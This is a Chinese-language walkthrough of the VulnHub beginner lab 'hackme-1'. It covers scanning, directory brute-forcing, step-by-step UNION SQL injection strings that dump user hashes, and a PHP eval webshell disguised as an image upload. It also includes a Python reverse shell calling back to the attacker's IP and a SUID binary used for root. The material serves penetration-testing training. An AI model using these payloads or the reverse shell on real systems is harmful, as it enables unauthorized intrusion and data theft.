Hackme-1

  • 环境搭建
    • 1. 详情
    • 2. 描述
  • 一:信息收集
    • 0x01主机发现
    • 端口扫描
    • 服务扫描
      • 服务器指纹信息查询
      • 网站目录爆破
  • 二:漏洞发现
    • 创建用户
    • SQL注入
    • MD5解密
    • 文件上传漏洞
      • 漏洞验证
  • 三:漏洞利用
    • 反弹shell法一: 一句话木马
  • 四:提权

环境搭建

测试机:kali:192.168.10.153
靶机:hackme-1:192.168.10.155

1. 详情

链接   https://www.vulnhub.com/entry/hackme-1,330/
发布日期    2019年7月18日
作者  x4bx54
难度  初学者,简单

2. 描述

‘hackme’ is a beginner difficulty level box. The goal is to gain
limited privilege access via web vulnerabilities and subsequently
privilege escalate as root. The lab was created to mimic real life
environment.

"hackme"是一个初学者难度级别的框。目标是通过 Web 漏洞获得有限的特权访问,然后将特权升级为
root。该靶机的创建是为了模拟现实生活环境。

0x02环境搭建

  1. 下载靶机
    官网链接直接下载

hackme-1下载地址

一:信息收集

0x01主机发现

arp-sacn -l

或者:

netdiscover -i eth0 -r 192.168.10.0/24

端口扫描

masscan --rate=10000 --ports 0-65535 192.168.10.155

服务扫描

 nmap -sV -T4 -O -p 22,80 192.168.10.155

服务器指纹信息查询

whatweb http://192.168.10.155

网站目录爆破

dirb http://192.168.10.155


访问靶机网站,搜集可用信息

二:漏洞发现

http://192.168.10.155/login.php 发现一个登录界面,
且有sign up now 点击创建新用户

创建用户


创建用户尝试登录
此处我创建
root
password的用户名密码

SQL注入

0x01 判断注入类型:

Windows os’ and 1=1#

windows os’ and 1=2#
发现为单引号字符型注入

0x02 判断字段数
Windows OS' order by 3#

发现字段数为三

0x03判断显示位
-1' union select 1,2,3#

0x04 查询库名
-1' union select database(),2,3#

0x05 查询表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

0x06查询列名
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

0x07 查询user password列的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#

MD5解密

将得到的数据进行MD5解密,得到用户名及密码,此处使用

superadmin 2386acb2cf356944177746fc92523983
Uncrackable

文件上传漏洞

漏洞验证

尝试登录,发现一文件上传的页面,尝试上传图片马

GIF89a<?php phpinfo();?> 将此代码写入记事本,并修改后缀为jpg

抓包查看,将文件后缀名改为phpinfo.php

查看文件目录,发现文件上传成功

三:漏洞利用

反弹shell法一: 一句话木马

0x01 制作图片马:

<?php @eval($_POST[shell]); ?>

copy a.jpg/b + tu.php/a b.jpg 将b.jpg上传,
访问上传的木马: http://192.168.30.207/uploads/b.php

0x02 蚁剑直连:

0x03 上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务

此为反弹shell脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.10.153”,443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])


0x04 kali监听443 端口

反弹shell成功

四:提权

识别所存在的用户

cat /etc/passwd | grep /bin/bash

在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件

./touchmenot


渗透结束,这个靶机考察了目录搜集,sql注入,文件上传漏洞,反弹shell等内容,靶机难度较为简单。

hackme-1初级渗透测试相关推荐

  1. 记一次初级渗透测试模拟过程

    0x00 前言 网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐.参赛者在竞技过程中能够更大的限度的收获专业知识.激发潜能.为了让更多人切身体会 ...

  2. 渗透测试入门27之渗透测试学习建议

    最近发现很多小伙伴都在问我想要学习渗透测试,但是不知道怎么开始,也不知道要学习什么?所以在这里我打算分享一下我的渗透学习之路以及给初学者的一些建议. 我的学习之路 转眼间,我从学习渗透测试到工作也快六 ...

  3. 3种常见的渗透测试漏洞总结,快来收藏√

    越权漏洞 越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广.危害大,被OWASP列为Web应用十大安全隐患的第二名. 所谓越权,顾名 ...

  4. termux使用教程python手机_渗透测试|利用手机攻击电脑(Termux终端初体验)

    至少我们曾经在一起过. 来自:一言 介绍 Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby ...

  5. 渗透测试-CS架构客户端

    网络架构模式 B/S和C/S都是随着互联网的发展而出现的一种网络结构模式,而其用的非常广泛,在我们生活中都很常见.那它们到底是什么呢?接下来就详细的介绍一下B/S和C/S. B/S架构 B是英文单词& ...

  6. 初级安全测试工程师的工资一般多少?

    安全测试是非常复杂的,相信大家都没有异议.一个专业的安全测试专家在某种程度上来说是一个全栈工程师.所以,想要在安全测试上一夜成才很难. 了解安全测试的薪资情况,首先你要知道安全测试岗位的职责: 1负责 ...

  7. 白帽子-高端信息安全培训(攻防技术、渗透测试、安全产品、安全标准、风险评估、等级保护、项目实战)...

    课程名字:白帽子-高端信息安全培训(攻防技术.渗透测试.安全产品.安全标准.风险评估.等级保护.项目实战) 课程讲师:heib0y 课程分类:网络安全 适合人群:初级 课时数量:100课时 用到技术: ...

  8. LINUX KALI初级渗透XP系统入门学习总结(一)

    LINUX KALI在 Metasploit框架下初级渗透XP系统入门学习总结(一) Metasploit的辅助模块主要用于信息搜集阶段,功能包括扫描.口令猜解.敏感信息嗅探.FUZZ测试发掘漏洞.实 ...

  9. “菜鸟安服仔”必用兵器之“渗透测试篇一”

    "菜鸟黑客"必用兵器之"渗透测试篇一" "菜鸟黑客"必用兵器之"渗透测试篇一" 大家好,我还是你们的老朋友"信 ...

最新文章

  1. 图灵访谈 | 王贝珊:乘风破浪的成长之路
  2. 适合python的笔记本配置-jupyter之配置自己喜欢的python环境
  3. springboot自动配置流程
  4. www.lfd.uci.edu网站下载python库显示404解决办法
  5. 算法竞赛入门经典_6数据结构基础
  6. JavaExcel工具类(兼容xls和xlsx)
  7. 设计师对孟菲斯设计风还不了解?
  8. windows下安装使用WGET
  9. Mapoutputcollector的几个方法
  10. python3中filter、map、reduce、apply、zip函数用法总结
  11. PreferenceScreen的应用
  12. java题库组卷系统_基于java的题库管理系统.doc
  13. 【手机连接adb的两种方法】
  14. 代码整洁之道Clean Code笔记
  15. mpa和pis_压力单位MPa/psi/bar之间的换算?
  16. 恢复icloud 微信无法连接服务器,从iCloud恢复,找回微信消息
  17. 由于目标计算机积极拒绝,无法连接。 Could not connect to Redis at 127.0.0.1:6379: 由于目标计算机积极拒绝,无法连接
  18. 也许是全网最全的 Angular 新手入门指南
  19. 通信新人,该如何写日报?
  20. 面试 HTTP ,99% 的面试官都爱问这些问题

热门文章

  1. elementUI 亮暗色切换和主题色设置 scss
  2. 医药产品经理渠道资源获取的方法有哪些?
  3. scikit-learn机器学习分析股票板块数据(KMeans,PCA,参数选择)
  4. 【Linux】Linux编程之 mmap解析
  5. git-secret:在 Git 存储库中加密和存储密钥(下)
  6. 【入门篇】Activiti流程绘制说明
  7. 基于nodejs的预约上门维修服务系统
  8. 打开jsp页面出现error解决办法
  9. python使用百度云API接口图片卡通化
  10. WordPress 如何阻止垃圾评论?